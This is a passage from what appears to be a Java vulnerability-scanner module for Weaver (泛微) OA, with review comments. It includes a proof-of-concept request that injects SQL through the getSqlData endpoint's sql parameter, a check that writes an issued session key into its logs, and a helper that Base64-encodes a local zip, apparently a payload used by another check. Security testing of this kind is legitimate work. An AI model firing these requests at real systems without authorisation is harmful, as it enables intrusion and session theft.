                boolean keyReturned = reply.statusCode == 200
                        && reply.responseBody.contains("sessionkey");
                if (!keyReturned) {
                    WriteFailLog("失败，状态码：" + reply.statusCode);
                    break;
                }
                // Sensitive: the logged body contains the issued session key.
                WriteSuccessLog("Session:" + reply.responseBody);
                break;
            }
            default:
                // EXP (and any other mode) sends nothing for this check.
                break;
        }
    }
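    /**
     * Tests {@code /Api/portal/elementEcodeAddon/getSqlData} for SQL injection through its
     * {@code sql} query parameter.
     *
     * <p>In {@code POC} mode one GET is sent with {@code sql=select <random>}, where
     * {@code <random>} is a fresh 5-character string, and the check succeeds when that string
     * appears in the response body. In {@code EXP} mode nothing is sent.
     *
     * <p>The annotation now classifies the check as {@code SQLInjection}; it previously said
     * {@code UploadFile}, which contradicted the description.
     *
     * <p>NOTE(review): the marker is also part of the request URL and the status code is not
     * checked, so any page that echoes the requested URL or query string (for example an
     * error page) produces a false positive. Confirm a hit manually before reporting.
     *
     * @param type   scan mode; only {@code POC} performs a request
     * @param target base URL the API path is appended to
     * @param args   not used by this check
     * @throws MalformedURLException declared by the signature; presumably raised when
     *                               {@code target} plus the path is not a valid URL
     */
    @VulnerabilityDescriptionMapping(Description = "泛微OA getSqlData sql注入漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.SQLInjection)
    public void vul_getSqlData(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("泛微OA getSqlData sql注入漏洞");
        String randomStr = Utils.getRandomString(5);
        String url = "/Api/portal/elementEcodeAddon/getSqlData?sql=select%20"+randomStr;
        switch (type){
            case EXP:
                // No exploit step is implemented for this check.
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                Response result = httpRequest.Get("");
                // Unlike the sibling checks there is no status guard in front of the body
                // test, so guard against a missing body instead of risking an NPE.
                if (result.responseBody != null && result.responseBody.contains(randomStr)){
                    WriteSuccessLog("存在漏洞 POC：" +target+url);
                }else {
                    WriteFailLog("失败，状态码："+result.statusCode);
                }
        }
    }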

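    /**
     * Developer-only helper: prints the Base64 encoding of a local {@code helps.zip}.
     *
     * <p>NOTE(review): this entry point reads a hard-coded path on the author's workstation
     * and has no role in scanning; it is presumably how the Base64 constant in
     * {@code vul_weaver_common_Ctrl} was generated. It should not ship in a release build.
     *
     * @param args ignored
     * @throws Exception if the file cannot be opened or read
     */
    public static void main(String[] args) throws Exception {
        // try-with-resources closes the stream on every path; the original never closed it.
        try (FileInputStream inputStream = new FileInputStream("C:\\Users\\Chun\\Desktop\\新建文件夹\\helps.zip")) {
            // Read until EOF: available() is only an estimate and a single read() may
            // return fewer bytes than requested, which would silently truncate the output.
            java.io.ByteArrayOutputStream buffer = new java.io.ByteArrayOutputStream();
            byte[] chunk = new byte[8192];
            int read;
            while ((read = inputStream.read(chunk)) != -1) {
                buffer.write(chunk, 0, read);
            }
            System.out.println(Utils.base64Encode(buffer.toByteArray()));
        }
    }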
}
